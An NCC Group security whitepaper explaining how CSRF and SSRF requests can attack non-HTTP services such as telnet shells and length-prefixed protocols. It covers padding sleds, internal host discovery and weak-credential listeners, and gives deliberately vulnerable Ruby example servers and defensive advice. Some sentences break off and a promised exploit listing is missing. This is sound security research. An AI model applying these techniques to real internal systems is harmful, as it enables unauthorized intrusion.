Cross-Protocol Request Forgery: NCC Group Whitepaper
Abstract
Server-Side Request Forgery (SSRF) and Cross-Site Request Forgery (CSRF) are two attack
methods that enable attackers to cross network boundaries in order to attack applications,
but can only target applications that speak HTTP. Custom TCP protocols are everywhere:
IoT devices, smartphones, databases, development software, internal web applications, and
more. Often, these applications assume that no security is necessary because they are only
accessible over the local network. This paper aims to be a definitive overview of attacks
that allow cross-protocol exploitation of non-HTTP listeners using CSRF and SSRF, and also
expands on the state of the art in these types of attacks to target length-specified protocols
that were not previously thought to be exploitable.
Table of Contents
1 Background, page 3
Prior Research, page 6
Command-Line Listener, page 14
Length-Delimited Listener, page 15
5 Conclusion, page 16
This paper both references existing research and expands upon it. Where possible, references are made throughout to
existing research on cross-protocol attacks. Many of the techniques contained in this whitepaper are known to
researchers who have explored cross-protocol attacks, but have seldom been discussed in depth in public research.
This whitepaper formally addresses and defines these techniques in order to promote further exploration of these
types of attacks. In later sections, length-specified protocols, authenticated listeners, and control of (and
workarounds for) browser behavior are introduced as new cross-protocol exploitation techniques.
This section goes over some background information on how request forgery attacks (CSRF and SSRF) can be used to
target internal networks that an attacker would not otherwise have access to.
This firewall-crossing property has been most strongly associated with SSRF vulnerabilities, and less often with CSRF.
For example, one common SSRF technique is to steal AWS credentials using the AWS metadata service, which only
runs on an internally-accessible IP address. CSRF attacks have been used in this way as well, but the primary target has
been consumer wireless routers [3], due to the inherent limitations of cross-site requests in web browsers [4].
The remainder of this section expands on how request forgery attacks (both CSRF and SSRF) can be used to target
internal networks that an attacker would not otherwise have access to. Readers who are already familiar with these
attack types may choose to skip ahead to Attacking Non-HTTP Listeners with Request Forgery on page 6.
XMLHttpRequest is an API, usable in all modern browsers, that allows cross-site requests. In the second line, the
method (POST) and target (a server on the local subnet) are specified. Finally, the send() call allows the request body
to be specified. Using this API, essentially any data - including binary data - can be sent in the request body (usage is
discussed in more detail in Advanced Exploitation and Real-World Debugging on page 11).
[1] https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
[2] https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
[3] https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2017/april/technical-advisory-quentanna/
[4] https://www.w3.org/TR/cors/#introduction
One important thing to note is that, in most scenarios, the attacker cannot read the server’s response [5]. Most CSRF
attacks need to use a single request, using only known or guessable data, to compromise the targeted device. This
explains why consumer routers have historically been the most common firewall-protected CSRF target. Almost every
router manufacturer has had easily-exploitable code execution vulnerabilities (Asus, D-Link, Netgear, etc.). Further,
consumer routers are extremely popular, rarely up-to-date, and generally have a known, fixed IP address on the
network, all qualities that make them easy to target.
• They are accessible on an internal network to employees within an office or connected using a VPN, or to another
application on the internal network that contains a known SSRF vulnerability.
• The target (though not its IP address or port) has to be known to the attacker. Exploits will be very targeted to
a specific application or device, so the most easily targetable will be open-source web applications (for example,
Jenkins [6]) and common networked devices like routers.
[5] DNS Rebinding does allow attackers to read server responses in some cases, and is explored more in Advanced
Exploitation and Real-World Debugging on page 11.
[6] https://groups.google.com/forum/#!topic/jenkinsci-advisories/lJfvDs5s6bk
Any device that can make an HTTP request could potentially be used to attack its own local listeners, including
smartphones, smart TVs, game consoles, and other embedded devices running browsers. Consider a local IT
employee setting up a new Windows server on EC2: it is almost guaranteed they will open a browser to download
software or look up the answer to a question. Can the site that comes up as the fifth search result for “How to configure
X software” be trusted not to attack that very software?
The purpose of the research contained in this paper is to explore the usage of CSRF and SSRF attacks to target non-
HTTP listeners. The motivating idea is the question: “How can we attack TCP listeners that we know are vulnerable, but
can’t reach over the network?” For example, if an Android phone has a local non-HTTP listener for a binary running as
root, is that listener only exploitable from a local application, or could it be targeted from a website as well?
Prior Research
The possibility of using HTTP requests to attack other protocols was first explored in a 2001 whitepaper by Jochen
Topf [7] and revisited in a 2007 whitepaper by NGSSoftware [8] (later acquired by NCC Group). The initial release of
these vulnerabilities caused major browsers to implement port blacklists in order to prevent attacks on specific, known
services. The HTML form techniques used in those papers are relatively outdated; the XMLHttpRequest API is now
much more powerful and can submit arbitrary binary data to any location, without the restrictions of HTML forms.
Since these whitepapers, there have been only a small number of public attacks of this type [9]. In 2009, the technique
was used to achieve cross-site scripting on certain sites through FTP [10], and in 2010, browsers were used to spam IRC servers [11]. The
most severe public discussion of a cross-protocol attack was from a 2014 blog post by Nicolas Grégoire. The blog post
attempted to attack Redis’s unauthenticated, text-based network interface. This attack was later expanded to achieve
full remote code execution.
A more in-depth resource on modern cross-protocol attacks was presented in a series of blog posts [12] and conference
talks [13] by Michele Orrù and Ty Miller as part of the BeEF Project. This research developed a working cross-protocol
exploit using XMLHttpRequest for a vulnerable IMAP server.
Across the realm of prior research, many different names have been used for cross-protocol attacks: “Cross-Protocol
Scripting”, “Inter-Protocol Exploitation”, “Cross-Site Printing”, and more. The use of the name “Cross-Protocol Request
Forgery” defines the scope of this paper, which will specifically cover cross-protocol attacks using request forgery
techniques (CSRF or SSRF).
The protocols are typically very simple and forgiving of errors and malformed messages. That is because they are
often created with little testing or used for debugging purposes - hard errors or crashes will be avoided at all costs. In
particular, spewing garbage data at these listeners often earns only a “could not parse message” error.
Almost as a rule, these listeners have high privileges and dangerous functionality. When asked about the security
impact of these listeners, developers tend to argue that their applications should not be exposed to untrusted input
and should always be behind some network control, such as a firewall. But as discussed in the previous section, network
[7] https://www.jochentopf.com/hfpa/hfpa.pdf [PDF]
[8] https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf [PDF]
[9] See also http://bugs.proftpd.org/show_bug.cgi?id=4143#c0, http://seclists.org/fulldisclosure/2010/Mar/447,
https://blog.lizzie.io/exploiting-CVE-2016-8606.html, and https://oaklandsok.github.io/papers/muller2017.pdf [PDF].
[10] Cross-protocol XSS with non-standard service ports (Internet Archive link)
[11] https://www.theregister.co.uk/2010/01/30/firefox_interprotocol_attack/
[12] See http://blog.beefproject.com/2012/11/revitalizing-inter-protocol.html and
http://blog.beefproject.com/2014/03/exploiting-with-beef-bind-shellcode_19.html.
[13] https://www.slideshare.net/micheleorru2/rooting-your-internals-exploiting-internal-network-vulns-via-the-browser-using-beef-bind
Command-Line Interface
The application presents a plaintext CLI-like interface, with or without username/password authentication. Databases
and shells are good examples, but many protocols expect a simple text-based interaction, such as SMTP.
How does this kind of listener respond to an HTTP request? We consider a simple example [14]: busybox’s built-in telnet
server, plus sh. Many embedded devices use a similar setup:
The Telnet protocol is essentially just raw ASCII, plus some non-critical control bytes. It’s possible to use netcat to talk
to this listener:
What will this listener do when it sees a web request? These lines, runnable in a developer console, demonstrate the
issue:
POST / HTTP/1.1
Host: localhost:2001
Connection: keep-alive
Content-Length: 23
Origin: http://www.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Referer: http://www.example.com/
Accept-Encoding: gzip, deflate, br
[14] This example is intentionally simplified for ease of explanation. It may not work reliably in the real world,
because busybox’s telnetd may stop processing input when the browser closes the connection upon receiving a malformed
response. For an example that more reliably demonstrates the problem, see Example Vulnerable Listeners on page 14.
The request is just plain ASCII - exactly what the listener expects. Of course, POST, Host and Connection don’t mean
anything to sh, but that is fine. It just reports an error and waits for the next valid command.
$ POST / HTTP/1.1
/bin/sh: 8: POST: not found
$ Host: localhost:2001
/bin/sh: 9: Host:: not found
$ Content-Length: 23
/bin/sh: 11: Content-Length:: not found
...
$ whoami > /tmp/test.txt
Once the listener reaches the body, it finally reads a valid command and executes it. Turning this type of exploit
into a script or webpage is straightforward. For a real-world example where this might be exploited, consider
CVE-2017-8224: the Chinese “WIFICAM” security camera uses a telnet listener with a weak, static password [15]. (For some
comments on exploiting an authenticated listener, see Advanced Exploitation and Real-World Debugging on page 11.)
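The behavior described above can be approximated with a short simulation. The following Ruby sketch is not the busybox listener; it models a hypothetical line-oriented shell (the `KNOWN_COMMANDS` list and the `simulate_cli_listener` name are assumptions made for illustration) and shows the header lines being rejected one by one while the line in the body is accepted:

```ruby
# Hypothetical model of a line-oriented listener such as a shell: each
# line is one command, and unknown commands are reported and skipped.
KNOWN_COMMANDS = %w[whoami id ls].freeze # assumption: illustrative command set

def simulate_cli_listener(raw_request)
  results = []
  raw_request.each_line do |line|
    line = line.chomp                 # strips a trailing "\r\n" or "\n"
    next if line.strip.empty?         # a blank line just yields a new prompt
    word = line.split.first
    status = KNOWN_COMMANDS.include?(word) ? :executed : :not_found
    results << [status, line]
  end
  results
end

body = "whoami > /tmp/test.txt\n"
request = [
  "POST / HTTP/1.1",
  "Host: localhost:2001",
  "Content-Length: #{body.bytesize}",
  "Content-Type: text/plain;charset=UTF-8",
  "",
  body
].join("\r\n")

simulate_cli_listener(request).each { |status, line| puts "#{status}: #{line}" }
```

Only the final line is reported as executed; everything the browser adds before the body is noise that the listener tolerates.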
Many types of delimited protocols are functionally similar to the command-line interface pattern and can be exploited
similarly easily. In a command-line interface, the delimiter is a newline (\x0d\x0a); protocols that use null-bytes to
indicate a boundary are also common. Some listeners may look for a delimiter on either side of a payload: for example,
a server that expects a sequence of XML messages starting with <xml> and ending with </xml>.
Length-Specified Protocols
Many simple protocols will read a length value, then read that number of bytes before processing a message. Slightly
more complex variations may require a fixed-length header or use full Type-Length-Value format. Again, the common
thread among vulnerable services is that malformed messages are simply ignored, and subsequent messages are
processed normally.
The simplest example is a protocol that expects a single length byte and then reads that many bytes. What does an
HTTP request look like to such a listener? Imagine sending a POST request with the body “blahblahblah”:
POST / HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 12
Origin: http://www.example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Referer: http://www.example.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8

blahblahblah
Assuming the entire HTTP request is present in the input buffer, the listener will process it as follows:
1. Immediately read a single byte (“P”) and interpret it as a length in bytes: 0x50, or 80 bytes.
2. Pop the next 80 bytes from the input buffer and process them as a message.
3. The processed message was invalid and is dropped. The listener continues processing the input buffer.
4. Repeat until the input buffer is exhausted: read a single byte (“r”), interpret it as a length (114 bytes), pop that many
bytes from the input buffer, and process them as a message.
5. If there are not enough bytes in the input buffer to retrieve a full message (step 2), wait until more data is retrieved
from the network.
[15] See comments on http://nm-projects.de/2017/01/hacking-ip-camera-digoo-bb-m2-part-3-getting-root-access/.
The full example is worked in the figure below. The most immediate takeaway from the example is that this type of
listener requires data to be padded and length-adjusted in order to be processed correctly. If an exploit payload is
simply copied into the body of a request, the listener will not process the payload correctly. Instead, the listener will
have interpreted some byte in the headers as a length, causing the payload to be only partially processed - and, almost
surely, processed incorrectly.
Figure 4: A length-specified protocol expects one to four bytes to specify a length, then reads that many bytes before
processing a message. Each red character is a byte interpreted as a length, and each underlined section is interpreted
as a message.
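The parsing steps described above can be sketched as a small simulation. This is a model of a hypothetical single-byte length-prefixed listener, not any specific product; the function name, the host address, and the shortened header set are assumptions chosen to keep the example small:

```ruby
# Model of a hypothetical listener with a one-byte length prefix: read one
# byte as a length, then treat that many following bytes as a message.
def split_length_prefixed(buffer)
  bytes = buffer.b                 # binary copy so offsets count bytes
  messages = []
  pos = 0
  while pos < bytes.bytesize
    len = bytes.getbyte(pos)
    # Not enough buffered data for a full message: a real listener would
    # block here until more bytes arrive from the network.
    break if pos + 1 + len > bytes.bytesize
    messages << bytes.byteslice(pos + 1, len)
    pos += 1 + len
  end
  [messages, bytes.byteslice(pos, bytes.bytesize - pos)]
end

# A shortened, hypothetical request (real browsers send more headers).
request = [
  "POST / HTTP/1.1",
  "Host: 192.168.1.20:9000",
  "Connection: keep-alive",
  "Content-Length: 12",
  "",
  "blahblahblah"
].join("\r\n")

messages, leftover = split_length_prefixed(request)
puts "first length byte:   #{request.getbyte(0)}"   # "P" is 0x50, i.e. 80
puts "messages parsed:     #{messages.length}"
puts "bytes still waiting: #{leftover.bytesize}"
```

In this sketch the 80 bytes after “P” are consumed as one invalid message, and the body never reaches the listener as a message of its own, which is the misalignment the paragraph above describes.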
If the HTTP headers are exactly known, it is relatively easy to pad the request body to exactly the right length. Then,
an exploit that works from a local network can (by prepending the correct padding) be transposed directly into an
exploit that works from a web browser. However, it is difficult to rely on the header ordering and length; these values
Instead of exact byte-counting, most protocols can be padded in a browser-independent way to create reliable
exploits. For many protocols, CPRF exploits can be padded using a “sled” of short or empty messages in the same
manner as a NOP sled. In the above example, simply prepending a string of null bytes to the request body will cause
the parser to slide through a sequence of empty messages until it reaches the exploit.
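A minimal sketch of the sled idea follows, again against a hypothetical one-byte length-prefixed parser. The function names, the header set, and the JSON payload are illustrative assumptions. The sled length of 256 is chosen because a message that starts in the headers can span at most 1 + 255 bytes, so 255 or more null bytes are enough for the parser to land inside the sled or exactly on the payload's length byte:

```ruby
# Hypothetical one-byte length-prefixed parser: returns every complete
# message found in the buffer.
def parse_messages(buffer)
  bytes = buffer.b
  messages = []
  pos = 0
  while pos < bytes.bytesize
    len = bytes.getbyte(pos)
    break if pos + 1 + len > bytes.bytesize   # incomplete message: stop
    messages << bytes.byteslice(pos + 1, len)
    pos += 1 + len
  end
  messages
end

# Prefix the payload with a sled of null bytes (each one parses as an
# empty message), followed by the payload's own length byte.
def sled_body(payload, sled_length = 256)
  raise ArgumentError, "payload too long for a one-byte length" if payload.bytesize > 255
  ("\x00" * sled_length).b + [payload.bytesize].pack("C") + payload.b
end

# Assumed, shortened header set; the exact headers do not matter here.
headers = "POST / HTTP/1.1\r\nHost: 192.168.1.20:9000\r\nContent-Type: text/plain\r\n\r\n"
payload = '{"name":"mallory"}'

messages = parse_messages(headers.b + sled_body(payload))
puts messages.reject(&:empty?).last
```

The last non-empty message is the payload itself, regardless of where in the sled the parser happens to land after consuming the headers.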
This trick is less likely to be successful with more complex protocols. In the worst case, a CSRF or SSRF request can
be sent repeatedly, with increasingly-large padding, until all possible paddings have been exhausted. On one hand,
this strategy is most effective for protocols with small (single-byte) length fields. On the other hand, protocols with
length fields of two or more bytes are likely to read the entirety of the HTTP headers as a single message, making exact
counting and padding straightforward.
Cross-Protocol Request Forgery can be used for extremely predictable and consistent exploitation of many services.
However, the design of a CPRF exploit often runs into a number of frustrating real-world stumbling blocks. This section
attempts to discuss stumbling blocks experienced by the author that can be overcome with some minor modifications
to most exploits.
1. Discover the internal IP address range. The JavaScript WebRTC API allows leakage of the host’s internal IP
address [16], while SSRF vulnerabilities can usually be used to discover the IP address of a live internal host. Similarly,
XMLHttpRequest timing information can be used to discover live hosts [17].
2. Systematically target the exploit at all addresses on the internal network. XMLHttpRequest and SSRF vulnerabilities
are both generally limited only by the speed of the connection to a destination; automating CPRF attacks is
straightforward as long as the exploit is relatively small and reliable.
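The second step can be sketched as simple address enumeration. The example below assumes the leaked address belongs to a /24 network, which is common for consumer routers but is not stated in the text; `candidate_hosts` and the example address are hypothetical:

```ruby
require 'ipaddr'

# List candidate hosts on the same network as a leaked internal address.
# Assumption: the network is a /24 unless another prefix length is given.
def candidate_hosts(leaked_ip, prefix_length = 24)
  network = IPAddr.new(leaked_ip).mask(prefix_length)
  addresses = network.to_range.map(&:to_s)
  addresses[1..-2] # drop the network and broadcast addresses
end

hosts = candidate_hosts("192.168.1.37")
puts "#{hosts.length} candidates, from #{hosts.first} to #{hosts.last}"
```

Each candidate would then be combined with the listener's port to form the request target.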
• HTTP Verb: Can be GET, POST, HEAD, or OPTIONS, but POST is the most useful because it is the only one of these
request types that can carry content in the body.
• Host and Origin Headers: These headers contain the domain name, which an attacker can set up to reflect arbitrary
internal IP addresses. As a result, they can contain any valid domain characters (Unicode domains are, unfortunately,
converted to punycode representations).
• CORS-Safelisted Headers: Any safelisted header can have an attacker-specified value, including arbitrary binary
data (but not null bytes, line breaks, or carriage returns). These headers are: Accept, Accept-Language, Content-
Language, Last-Event-ID, DPR, Save-Data, Viewport-Width, and Width. The Content-Type header can also be
modified, but its value is restricted.
POST bodies sent with XMLHttpRequest can contain arbitrary binary data, including newlines and null bytes. Payloads
containing only ASCII data (i.e. no bytes greater than 0x7f) can be passed directly to the send() call as a string. To
include non-ASCII data, payloads should be converted to a Blob or ArrayBuffer. When using XMLHttpRequest, HTTP
bodies are generally not mangled by the browser, regardless of the Content-Type value.
Authenticated Listeners
Authentication prompts can be a major impediment to a successful exploit. Assuming an authenticated listener has
known or easily-guessable credentials, it is still possible to target these listeners. In the author’s experience, the
following points are worth keeping in mind:
• Username and password values have to be delivered in order and at the right time. When developing the exploit,
count the number of lines sent by the browser to make sure that the listener receives the correct values. Listeners
that close connections after only a small number of login attempts may be impossible to exploit.
• Listeners which perform expensive password hashing may or may not be exploitable. MD5 is quick enough to be
essentially ignored, but bcrypt can take so long that the connection is closed before any payload is delivered.
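The line-counting advice in the first point can be illustrated with a toy model. The sketch below assumes a hypothetical listener that consumes input in (username, password) pairs and allows a limited number of attempts; the function names, the filler value, and the credentials are all invented for illustration:

```ruby
# Hypothetical login listener: lines are consumed in (username, password)
# pairs until one pair matches; the remaining lines reach the command
# interpreter. Returns nil if authentication never succeeds.
def simulate_login_listener(raw, valid_user, valid_pass, max_attempts = 10)
  lines = raw.each_line.map(&:chomp)
  attempts = 0
  until lines.empty? || attempts >= max_attempts
    attempts += 1
    user = lines.shift
    pass = lines.shift
    return lines if user == valid_user && pass == valid_pass
  end
  nil
end

# The lines sent before the body (headers plus the blank separator) are
# consumed in pairs, so an odd count needs one filler line to make the
# username land on a username prompt.
def aligned_body(lines_before_body, username, password, command)
  filler = lines_before_body.odd? ? ["x"] : []
  (filler + [username, password, command]).join("\n") + "\n"
end

headers = ["POST / HTTP/1.1", "Host: 192.168.1.20:2323",
           "Content-Type: text/plain", "Accept: */*"]
body = aligned_body(headers.length + 1, "admin", "admin", "id")
raw = headers.join("\r\n") + "\r\n\r\n" + body

p simulate_login_listener(raw, "admin", "admin")      # => ["id"]
p simulate_login_listener(raw, "admin", "admin", 3)   # => nil
```

The second call shows the failure mode mentioned above: the header lines alone use up three login attempts, so a listener that allows only three never sees the real credentials.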
[16] https://browserleaks.com/webrtc
[17] https://github.com/beefproject/beef/wiki/Network-Discovery#identify-lan-subnets
[18] For more information, see https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS or https://xhr.spec.whatwg.org/.
• HTTPS: HTTP over a TLS-encrypted channel. Connections can easily be created by specifying the protocol, but the
only easily-modifiable value in the handshake is the SNI hostname. HTTPS may be useful to exploit TLS-enabled
listeners in the same way as plain TCP listeners.
• FTP: Browsers support FTP file servers, but the author is not aware of any way to usefully control these
connections from JavaScript. As a result, it seems unlikely that FTP is more useful than HTTP.
• Websockets (WS and WSS): Websockets are essentially a direct TCP connection between hosts. However, a
Websocket connection can only be created by performing a valid HTTP handshake and response; non-Websocket-
aware listeners will never create a valid response, which is necessary for the browser to upgrade the connection.
• QUIC and HTTP/2: These new browser protocols do not seem to be useful for cross-protocol exploitation as there
is currently no way to control them using JavaScript.
As a workaround, padding the end of the request body with a large amount of unimportant data often causes the
browser and listener to hold the connection open for longer, in order to force the listener to process the payload that
appears at the start of the body.
Alternatively, using the Fetch API may cause browsers to hold connections open longer if the keepalive flag is set.
(Fetch is a newer alternative to XMLHttpRequest supported in the major browsers; for the purposes of cross-protocol
attacks, the functionality of the two APIs is essentially the same.)
TCP Segmentation
TCP connections are buffered. They wait for some minimum amount of data before sending, and will generally send
only a maximum amount of data at a time. As a result, the network driver will split up sent data into a number of TCP
data units (“segments”) depending on when it receives the data from the application and the size of the data. For
example, when sending an HTTP request of 55876 bytes (Chrome on OS X), Wireshark shows:
The first segment (394 bytes) is the HTTP header, which Chrome passes in the initial network write. In a second network
write, Chrome sends the body. So, the body is split up into three maximum-sized (16384 byte) segments with the final
segment containing all leftover data.
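The arithmetic behind this split can be checked with a short calculation. The sketch assumes that the 55876-byte total includes the 394-byte header; the function name is hypothetical:

```ruby
# Split a request into the write sizes described in the text: one write for
# the header, then the body in chunks of at most max_segment bytes.
def segment_sizes(total_bytes, header_bytes, max_segment)
  body_bytes = total_bytes - header_bytes
  full, rest = body_bytes.divmod(max_segment)
  sizes = [header_bytes] + [max_segment] * full
  sizes << rest if rest > 0
  sizes
end

p segment_sizes(55_876, 394, 16_384)
# => [394, 16384, 16384, 16384, 6330]
```

Under that assumption, the final segment carries the remaining 6330 bytes of the body.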
Generally, browsers will process and send request data quickly enough that segmentation does not affect how most
listeners handle data. However, for listeners that are sensitive to data lengths, it may be helpful to craft payloads
carefully in order to cause reads at specific locations in the incoming data.
HTTP Proxies
HTTP proxies, such as Burp Suite or mitmproxy, generally do a reasonable job of not modifying the actual text of a
request and response. The underlying TCP connection, however, is completely changed. Further, these proxies do
not handle non-HTTP data well. It will likely be significantly more difficult to develop a successful exploit through an
intercepting proxy, and the exploit will more-than-likely not succeed without modification when run without the proxy.
The author strongly recommends disabling all proxies between the browser and target, and using a tool such
as Wireshark to view data on-the-wire. Alternatively, consider directly debugging the listener or adding logging
statements around network handling.
Command-Line Listener
This server demonstrates a command-line interface:
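require 'socket'

# Assumption: the line that creates `server` is missing from this listing;
# the address and port below are placeholders.
server = TCPServer.new('127.0.0.1', 9999)

loop do
  # Handle each connection in its own thread.
  Thread.start(server.accept) do |client|
    client.write "cli> "
    until client.eof?
      line = client.gets
      case line
      when /^echo ?['"]?([\w ]+)?['"]?/
        client.puts $1
      when /^win ['"]?([\w -]+)['"]?/
        # Record the winner: the state-changing action an exploit would target.
        name = $1
        File.open("./winners.txt", "a") { |f| f.write(name + " won!\n") }
      when /^(help|\?)/
        client.puts "echo [string] - print a string"
        client.puts "win [name] - win the game"
        client.puts "help - print this help"
        client.puts "quit - quit this console"
      when /^quit/
        client.puts "bye!"
        break
      else
        # Unrecognized input (such as HTTP headers) is reported and skipped.
        client.puts "unknown command"
      end
      client.flush
      client.write "cli> "
    end
    client.close
  end
end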
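Length-Delimited Listener
This server demonstrates a length-delimited protocol with a single-byte length field:
require 'socket'
require 'json'

# Assumption: the line that creates `server` is missing from this listing;
# the address and port below are placeholders.
server = TCPServer.new('127.0.0.1', 9998)

# Read one message: a single length byte followed by that many bytes of JSON.
def client_loop(client)
  len = client.readbyte
  data = client.read(len)
  message = {}
  begin
    message = JSON.parse(data)
  rescue JSON::ParserError
    # Malformed messages are logged and dropped; the connection stays open.
    STDOUT.puts "Malformed message"
  rescue Exception => e
    STDOUT.puts "Unknown Error"
  end
  # Ignore valid JSON that is not an object (for example a bare number).
  message = {} unless message.is_a?(Hash)
  match = /([\w\d -]{2,})/.match(message["name"].to_s)
  if match
    File.open("./winners.txt", "a") { |f| f.write(match[1] + " won!\n") }
  end
  return
end

loop do
  Thread.start(server.accept) do |client|
    begin
      # Keep reading messages until the peer closes the connection.
      until client.eof?
        client_loop(client)
      end
    rescue Exception => e
      STDOUT.puts e
    ensure
      client.close
    end
  end
end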
A successful exploit is more complicated, requiring padding before the payload (the amount of padding was chosen
arbitrarily):
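One way to build such a padded request outside the browser is sketched below in Ruby. It is a stand-in for a browser-based exploit rather than the author's code: the function names, the header set, the 300-byte padding, and the host and port are assumptions, and the target is the example length-delimited listener with a one-byte length field.

```ruby
require 'socket'
require 'json'

# Build a body for the example length-delimited listener: a sled of null
# bytes (parsed as empty messages), one length byte, then the JSON message.
def build_padded_body(name, padding = 300)
  message = JSON.generate({ "name" => name })
  raise ArgumentError, "message exceeds a one-byte length" if message.bytesize > 255
  ("\x00" * padding).b + [message.bytesize].pack("C") + message.b
end

# Wrap the body in a minimal HTTP POST similar to what a browser would send.
# The header set here is an assumption; real browsers send more headers.
def build_request(body, host, port)
  headers = [
    "POST / HTTP/1.1",
    "Host: #{host}:#{port}",
    "Content-Type: text/plain;charset=UTF-8",
    "Content-Length: #{body.bytesize}"
  ]
  (headers.join("\r\n") + "\r\n\r\n").b + body
end

# Send the request to the listener (host and port are placeholders).
def send_request(host, port, name)
  request = build_request(build_padded_body(name), host, port)
  TCPSocket.open(host, port) { |sock| sock.write(request) }
end

# Example, with the listener running locally on the placeholder port:
# send_request("127.0.0.1", 9998, "mallory")
```

The padding must be at least 255 bytes for a one-byte length field so that the parser is guaranteed to land inside the sled after consuming the headers.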
At an infrastructure level, organizations should consider architecting their networks to completely prevent web
browsers from making requests to non-web applications. For example, firewalling all ports except 80 and 443 into a
virtual network which is accessible only via a bastion host will prevent cross-protocol attacks from employee machines.
Non-HTTP services can then be accessed via the bastion host, but will not be vulnerable to attacks from web browsers
or SSRF in servers outside the virtual network. This does not represent a full solution to the problem, but is a solid first
line of defense.
At an application level, CPRF vulnerabilities can be prevented by ensuring that all local listeners require a handshake
before exchanging messages. This type of handshake can be as simple as a back-and-forth “hello,” but failed or
malformed handshake messages must cause the connection to be immediately closed. Essentially, it needs to be
impossible to replicate a valid handshake using HTTP. Most importantly, developers must consider the possibility of
malicious requests being made to their network listeners - even if those listeners are on a private network, or only listen
on localhost. Strongly authenticating these channels (rather than relying on the security of the network) is absolutely
critical.
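A minimal sketch of such a handshake is shown below, assuming a hypothetical text greeting in which the listener sends a fresh nonce and accepts the connection only if the first line it reads echoes that nonce back. The message format and the `handshake_ok?` name are invented for illustration, and this is a complement to authentication, not a replacement for it:

```ruby
require 'securerandom'
require 'stringio'

# Hypothetical handshake: the listener sends a fresh nonce and only accepts
# the connection if the first line it reads echoes that nonce back.
def handshake_ok?(reader, writer, nonce = SecureRandom.hex(8))
  writer.write("HELLO #{nonce}\n")
  reply = reader.gets("\n", 64)   # first line only, capped at 64 bytes
  reply == "HELLO-ACK #{nonce}\n"
end

# In an accept loop this would be used as:
#   client.close unless handshake_ok?(client, client)

# A forged HTTP request starts with an HTTP verb and, in the common case
# where the attacker cannot read responses, cannot know the nonce.
forged = StringIO.new("POST / HTTP/1.1\r\nHost: 127.0.0.1:9998\r\n\r\n")
puts handshake_ok?(forged, StringIO.new)                 # prints "false"

# A protocol-aware client that has read the greeting passes.
honest = StringIO.new("HELLO-ACK 0123abcd\n")
puts handshake_ok?(honest, StringIO.new, "0123abcd")     # prints "true"
```

The important property is that a failed handshake closes the connection immediately, so nothing later in the HTTP request is ever parsed as a message.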